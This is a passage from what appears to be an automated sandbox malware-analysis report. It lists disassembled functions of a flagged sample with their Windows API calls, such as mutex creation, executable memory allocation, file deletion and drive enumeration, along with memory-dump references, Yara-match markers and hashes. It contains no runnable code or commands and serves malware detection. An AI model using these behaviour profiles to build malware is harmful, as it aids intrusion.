                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID:
                                    • API String ID: 3168844106-0
                                    • Opcode ID: 61733606fb079c792acf03253f65053a54256ed624295d125602130690d78f4f
                                    • Instruction ID: a6e1876e40902dbb0fecc75f1e437a983601b2116b163b2cb18036ad356ffd28
                                    • Opcode Fuzzy Hash: 61733606fb079c792acf03253f65053a54256ed624295d125602130690d78f4f
                                    • Instruction Fuzzy Hash: ECA1BFB1D041A89BDB35CB95CC90BEEB7B6BF44304F5480EADA09AB241D7B05B89CF54
                                    Function 0042A230 Relevance: 4.6, APIs: 3, Instructions: 110windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042A259
                                    • IsWindow.USER32 ref: 0042A287
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042A356
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessagePeek$Window
                                    • String ID:
                                    • API String ID: 1210580970-0
                                    • Opcode ID: 187b308dbf171e8d37968bd37c9ea0b6189e1286ba0c45a420ef79306f67df00
                                    • Instruction ID: f907a51aedf76f2611a8a5105eb0f7c07987ff6b3b405e3f60f627b49ca2c918
                                    • Opcode Fuzzy Hash: 187b308dbf171e8d37968bd37c9ea0b6189e1286ba0c45a420ef79306f67df00
                                    • Instruction Fuzzy Hash: 66316071704226EFD714DF24E984AABB3A8FF44349F40016EED1583340D775ED69CAAA
                                    Function 00410EF0 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00410F13
                                    • GetParent.USER32(?), ref: 00410F1D
                                    • EqualRect.USER32(?,?), ref: 00410FD1
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2CFE
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2D07
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClientRectScreenWindow$EqualLongParent
                                    • String ID:
                                    • API String ID: 3286289996-0
                                    • Opcode ID: 1d5a40d18057f79ae47ddeb70d7000ebec6ce2ecc0726b29fa7d463e1de40726
                                    • Instruction ID: 15f6815d7bce29e04a7444650ba576bb2e531206dd4922216284c3fd3da7f5a2
                                    • Opcode Fuzzy Hash: 1d5a40d18057f79ae47ddeb70d7000ebec6ce2ecc0726b29fa7d463e1de40726
                                    • Instruction Fuzzy Hash: 0F3118B16043029FD724DF6AC88196BB7E9BF88314F044A2EF895C3350D774EC858B56
                                    Function 0242CA87 Relevance: 4.5, APIs: 3, Instructions: 46stringthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,024A3A30), ref: 0242CAE0
                                    • GetDriveTypeA.KERNEL32(00000000), ref: 0242CAF9
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242CB20
                                      • Part of subcall function 0242BADD: Sleep.KERNEL32(?,?,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB57
                                      • Part of subcall function 0242BADD: lstrcat.KERNEL32(?,024A5658), ref: 0242BB75
                                      • Part of subcall function 0242BADD: lstrcpy.KERNEL32(00000000,?), ref: 0242BB8F
                                      • Part of subcall function 0242BADD: CharLowerA.USER32(00000000,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB9C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$CharDriveExitLowerSleepThreadTypeUserlstrcat
                                    • String ID:
                                    • API String ID: 362529667-0
                                    • Opcode ID: f216ac5581bfe7dfe4ff1dfbab5d38bb6e41758e21ee8a8f9038270ea223ced9
                                    • Instruction ID: 43e999b9b1a00bb2aeb7337a2b5e2ac6e10c36b79c6a89b4cc4012ef25c8e0a7
                                    • Opcode Fuzzy Hash: f216ac5581bfe7dfe4ff1dfbab5d38bb6e41758e21ee8a8f9038270ea223ced9
                                    • Instruction Fuzzy Hash: 0E1180719002189FDB298B59CC54BEABBB9EB48B00F0405EAE709A7240DB716A54CF91
                                    Function 02421189 Relevance: 4.5, APIs: 3, Instructions: 39sleepsynchronizationthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 024211D2
                                    • Sleep.KERNEL32(00004E20), ref: 024211F3
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024211FD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitObjectSingleSleepThreadUserWait
                                    • String ID:
                                    • API String ID: 295063474-0
                                    • Opcode ID: cc2caef5e03ede73cea636d63e7201d2c41a0a8e00b48c5908ee79104b1ce604
                                    • Instruction ID: bdefa6875ada45ef91176af57548950c11ee3660c9714fd0b49b5c729b3affbe
                                    • Opcode Fuzzy Hash: cc2caef5e03ede73cea636d63e7201d2c41a0a8e00b48c5908ee79104b1ce604
                                    • Instruction Fuzzy Hash: 7701A270A40228EBEB06CFC1DD44BBE7B75AB05704F504046E90D672C1C7B29F64DB50
                                    Function 0242B811 Relevance: 4.5, APIs: 3, Instructions: 26sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalFree.KERNEL32(?), ref: 0242B825
                                    • RtlLeaveCriticalSection.NTDLL(02434018), ref: 0242B837
                                    • Sleep.KERNEL32(00000400), ref: 0242B852
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalFreeGlobalLeaveSectionSleep
                                    • String ID:
                                    • API String ID: 2599486065-0
                                    • Opcode ID: 622864012b3458ed6115674a9ef5c24db42a0dddbd95fe6f05ccabf126fbdea2
                                    • Instruction ID: b2b03902117cd888f210f214a8bc5ea51d6c5ec5a93e6aa12b3d921751315d8e
                                    • Opcode Fuzzy Hash: 622864012b3458ed6115674a9ef5c24db42a0dddbd95fe6f05ccabf126fbdea2
                                    • Instruction Fuzzy Hash: 1DF05E76E803168BEB258F85D8097FDB770FB04326F000169EA25A3680C73A1555CF40
                                    Function 004BDCEB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BDCF0
                                      • Part of subcall function 004C5FF6: TlsGetValue.KERNEL32(006142FC,00000000,00000100,004C5A7D,004C5377,004C1DA3,00000100,004C1D3C,005BDEE8,?,00000100,00000000,0042AC80), ref: 004C6035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologValue
                                    • String ID: Ba
                                    • API String ID: 3700342317-483125461
                                    • Opcode ID: 4940d6c0a1d236279989cbbd311e788973838fc19b5a32bbe1ed35f3eb786344
                                    • Instruction ID: bfadfd5d42b8c54b2fdff8633d4eb08d3e35066eebefdf48a2d75ea75c4a5b15
                                    • Opcode Fuzzy Hash: 4940d6c0a1d236279989cbbd311e788973838fc19b5a32bbe1ed35f3eb786344
                                    • Instruction Fuzzy Hash: 30212776900209EFCF15DF55C481AEE7BB9FF44318F1040AAF919AB641D778AE44CBA4
                                    Function 0063E7E8 Relevance: 3.3, APIs: 2, Instructions: 256memorysynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0063E902
                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0063E9B1
                                      • Part of subcall function 0063EBC1: KiUserExceptionDispatcher.NTDLL(?,0063EB69), ref: 0063EBC7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AllocCreateDispatcherExceptionMutexUserVirtual
                                    • String ID:
                                    • API String ID: 979207007-0
                                    • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction ID: 2acce396b23e9bdbe9f0c66d83fc87edf770f2d68677d980aa99b4d2e4701c19
                                    • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction Fuzzy Hash: 79B14B75A002898FEF10CF14CD44BE977A6FF54304F484525DD09AF3A1D776AA81CBAA
                                    Function 043106D2 Relevance: 3.3, APIs: 2, Instructions: 256sleepsynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 043107EC
                                    • Sleep.KERNEL32(00002710), ref: 0431080F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3828792979.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_4310000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateMutexSleep
                                    • String ID:
                                    • API String ID: 1464230837-0
                                    • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction ID: c1aa8fa9c57fbafc359af538ffe60da7249491c25c948457293f595f5a000555
                                    • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction Fuzzy Hash: C4B14775A002898FEF18CF14CD84BA937B9BF44310F485925DD09AFAB1D771BA80CB4A
                                    Function 0242F030 Relevance: 3.0, APIs: 2, Instructions: 37fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,024A3A34), ref: 0242F067
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,0242232C), ref: 0242F08E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateMappingView
                                    • String ID:
                                    • API String ID: 3452162329-0
                                    • Opcode ID: cad824f100b975ee43af7378ce4ce0b65362b7a2f1823714ee30df1823b73057
                                    • Instruction ID: 140d03ecb175d38d51f3c81798e079bd0048d36ab188d3fdb90844c8e2418529
                                    • Opcode Fuzzy Hash: cad824f100b975ee43af7378ce4ce0b65362b7a2f1823714ee30df1823b73057
                                    • Instruction Fuzzy Hash: B601A874A40208EFD714CF84DA45F99BBF5BB48714F348288EA086B3C1C772AE45DB44
                                    Function 02427C71 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapViewOfFile.KERNEL32(00000264,00000006,00000000,00000000,00015400), ref: 02427CA8
                                    • UnmapViewOfFile.KERNEL32(?), ref: 02427CD7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileView$Unmap
                                    • String ID:
                                    • API String ID: 3282598733-0
                                    • Opcode ID: 0fe50f710d322869498a4a8262a0eabfd5281542e034c847b71978673071092a
                                    • Instruction ID: 09ff6dacee46042063c3d9cee3ee9f7065aceeab038a01848f935c91b1cd6266
                                    • Opcode Fuzzy Hash: 0fe50f710d322869498a4a8262a0eabfd5281542e034c847b71978673071092a
                                    • Instruction Fuzzy Hash: 4DF0AF74D40308EBDB15CFA5ED8DBCDBB78A704309F208545E5086B2C0D3B15A98DB40
                                    Function 00434AF0 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageA.USER32(?,?,00000001,00000020,00000020,00000000), ref: 00434B0B
                                    • LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00434B1D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ImageLoad
                                    • String ID:
                                    • API String ID: 306446377-0
                                    • Opcode ID: 97660890461d6f248d087cfd64102127baef94f3fc10542732be59e4ac67cab9
                                    • Instruction ID: 99e3c80fe0c46458d54351069af077a3b2b9013ff7e392769ec94d4996fec16e
                                    • Opcode Fuzzy Hash: 97660890461d6f248d087cfd64102127baef94f3fc10542732be59e4ac67cab9
                                    • Instruction Fuzzy Hash: 11E0ED3234131177D620CE5A8C85F9BF7A9FB8DB10F540819B344AB1D1C2F1B4458669
                                    Function 02425719 Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFileAttributesA.KERNEL32(?,00000020,?,02429A55,?,00000000), ref: 02425740
                                    • DeleteFileA.KERNEL32(?,?,02429A55,?,00000000), ref: 0242574A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesDelete
                                    • String ID:
                                    • API String ID: 2910425767-0
                                    • Opcode ID: b69c557a84d6782e6a7565767df2bc1d604140ded95d4cbc74542836b27083c9
                                    • Instruction ID: 66475dc1dde81f4b84ad516a9fafc2897687b715e930b8a4c38da75c98bbdd76
                                    • Opcode Fuzzy Hash: b69c557a84d6782e6a7565767df2bc1d604140ded95d4cbc74542836b27083c9
                                    • Instruction Fuzzy Hash: E7E0D8705C4714FBC7284B62D84AB6637986B88794FC0C423FE0A9D140D679E0CDCB50
                                    Function 0242BE4B Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindClose.KERNEL32(00000000), ref: 0242BE65
                                    • Sleep.KERNEL32(00000400), ref: 0242BE70
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFindSleep
                                    • String ID:
                                    • API String ID: 1358061995-0
                                    • Opcode ID: ebfbaac0b6fab46e20a7014245e6efb63f14c29218179942c90a94eb66b89ba2
                                    • Instruction ID: 75368b97eecc14ca1b0a14f0b550b5acdd5927bd928612c64a3a9fc0f32d3673
